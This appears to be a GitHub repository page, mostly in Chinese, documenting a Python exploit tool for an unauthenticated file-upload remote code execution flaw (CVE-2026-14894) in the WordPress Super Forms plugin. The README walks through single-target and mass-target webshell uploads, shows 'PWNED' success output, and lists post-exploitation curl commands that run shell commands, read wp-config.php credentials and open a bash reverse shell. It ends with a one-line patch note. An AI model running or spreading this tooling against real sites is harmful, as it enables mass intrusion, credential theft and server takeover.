1beelze/CVE-2026-14894
GitHub: 1beelze/CVE-2026-14894
针对 WordPress Super Forms 插件未认证文件上传导致远程代码执行漏洞(CVE-2026-14894)的 Python PoC 利用工具,支持单目标和批量扫描。
Stars: 0 | Forks: 0
# CVE-2026-14894 — Super Forms ≤ 6.3.313
/shell.php ← primary
│ (always exec)
│
└── Random folder → /wp-content/uploads/superforms/... ← fallback
(exec depends on server policy)
│
▼
[3] Shell Discovery
├── S0: media?parent=entry_id (WP REST)
├── S1: REST /wp/v2/media search (unauth)
├── S2: Apache/nginx directory listing
└── S3: WP sitemap attachment XML
│
▼
[4] RCE → curl "http://target/wp-content/themes/theme/shell.php?c=id"
```
## 环境要求
```
pip install requests urllib3
```
- Python 3.8+
- 目标 WordPress 站点的网络访问权限
## 用法
### 单一目标
```
python cve-2026-14894.py
```
```
CVE-2026-14894 │ Super Forms ≤ 6.3.313
Unauthenticated File Upload → Remote Code Execution
Researcher: andrea bocchetti | PoC: Beelze
1 Single target
2 Mass targets (file)
Mode (1/2): 1
Target URL : https://target.com
Form ID (enter=auto) : ← leave blank = auto-discover
Shell name (enter=random): ← leave blank = random name
Shell file (enter=built-in): ← leave blank = built-in shell
WP user (optional/REST) : ← optional, improves discovery
WP pass (optional/REST) : ← optional
```
**成功时的预期输出:**
```
──────────────────────────────────────────────────────────────
TARGET https://target.com
──────────────────────────────────────────────────────────────
Super Forms v6.3.301 vulnerable ≤6.3.313
[1/3] Mint nonce ...................... ✔ OK a3f9e1c... sid=sess_ab...
[2/3] Upload [xkqmhzjt.php] .......... ✔ OK form_id=42 entry_id=137
[3/3] Shell discovery ................ ✔ FOUND → RCE [path traversal → theme]
╔══════════════════════════════════════════════════════════════╗
║ ✓ PWNED → RCE CONFIRMED ║
║ ║
║ Shell » https://target.com/wp-content/themes/astra/shell ║
║ RCE » uid=33(www-data) gid=33(www-data) ║
║ ║
║ $ curl "https://target.com/...shell.php?c=whoami" ║
╚══════════════════════════════════════════════════════════════╝
```
### 批量扫描
```
Mode (1/2): 2
Targets file : targets.txt ← one URL per line, # = comment
Form ID (enter=auto) :
Threads (enter=5) : 10
Shell file (enter=built-in):
WP user (optional/REST) :
WP pass (optional/REST) :
```
**targets.txt 格式:**
```
# Bug bounty 范围
https://site1.com
https://site2.com
https://site3.com
```
**批量扫描输出:**
```
══════════════════════════════════════════════════════════════
MASS SCAN 3 targets threads=10
══════════════════════════════════════════════════════════════
[01/03] https://site1.com .... RCE uid=33(www-data)
↳ https://site1.com/wp-content/themes/astra/xkqmhzjt.php
[02/03] https://site2.com .... WRITE no exec
↳ https://site2.com/wp-content/uploads/superforms/2026/07/.../shell.php
[03/03] https://site3.com .... FAIL plugin inactive / blocked
══════════════════════════════════════════════════════════════
SUMMARY 1 RCE 1 WRITE_ONLY 0 MAYBE / 3 total
══════════════════════════════════════════════════════════════
RCE SHELLS:
» https://site1.com/wp-content/themes/astra/xkqmhzjt.php (uid=33...)
```
## 自定义 Shell
你可以提供自己的 shell 文件来代替内置的 webshell:
```
Shell file (enter=built-in): /path/to/myshell.php
```
该工具将上传你的文件,并将任何带有非空正文的 `200` 响应视为 RCE 成功的确认。
## Shell 交互
获取 RCE 后,与 shell 进行交互:
```
# 命令执行
curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=id"
curl -sk "https://target.com/wp-content/themes/theme/shell.php?c=cat+/etc/passwd"
# 读取 WordPress config(creds、DB)
curl -sk "https://target.com/.../shell.php?c=cat+/var/www/html/wp-config.php"
# Reverse shell
curl -sk "https://target.com/.../shell.php" --data "c=bash+-c+'bash+-i+>%26+/dev/tcp/LHOST/LPORT+0>%261'"
```
## 输出
结果会自动保存至:
```
~/Documents/CVE-2026-14894/result_YYYYMMDD_HHMMSS.json
```
## 状态码
| 状态 | 含义 |
|-----------------|---------------------------------------------------------------------|
| `RCE` | 确认 PHP shell 已执行 — 完全的远程代码执行 |
| `WRITE_ONLY` | 文件已写入但 PHP 未执行(引擎关闭 / .htaccess 拒绝) |
| `POSSIBLE_WRITE`| 上传返回成功,但无法解析 shell URL |
| `FAIL` | 插件未激活,nonce 失败,或检测到已修复版本 |
## 缓解措施
将 **Super Forms** 更新至 **≥ 6.3.314**。该补丁在 `datauristring` 上传中强制要求 `.pdf` 扩展名,并添加了 `realpath()` 限制以防止路径遍历。
## 免责声明
CVE-2026-14894 · Super Forms ≤ 6.3.313 · 未认证文件上传 RCE
研究员:andrea bocchetti · PoC:Beelze
标签:CISA项目, Python, Web安全, WordPress, 无后门, 编程工具, 蓝队分析, 远程代码执行, 逆向工具